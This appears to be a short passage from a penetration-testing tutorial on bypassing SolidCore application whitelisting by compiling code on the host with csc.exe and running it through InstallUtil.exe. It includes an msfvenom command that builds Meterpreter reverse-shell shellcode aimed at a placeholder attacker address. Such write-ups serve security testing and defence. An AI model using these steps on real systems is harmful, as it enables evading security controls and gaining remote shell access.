Bypassing Application Whitelisting Solution SolidCore Part II
Execution of Malicious Code without Disabling SolidCore Service
In these scenarios, our goal is not to disable Solidcore, but to run unauthorized code while SolidCore is still running.
Using ASP.NET Framework Utility csc.exe and Installutil.exe
In this attack scenario, we write some nifty code and compile it on the system itself. The csc.exe is a csharp compiler which is located in “C:\Windows\Microsoft.NET\Framework\v2.0.50727\”.
Its location might vary depending on the exact configuration of a particular computer. If more than one version of the .NET Framework is installed on your computer, you’ll find multiple versions of this file.
For getting a reverse shell, we created shellcode using “msfvenom” utility
msfvenom -p windows/meterpreter/reverse_tcp lhost=attackerip lport=443 -f csharp > shellcode.txt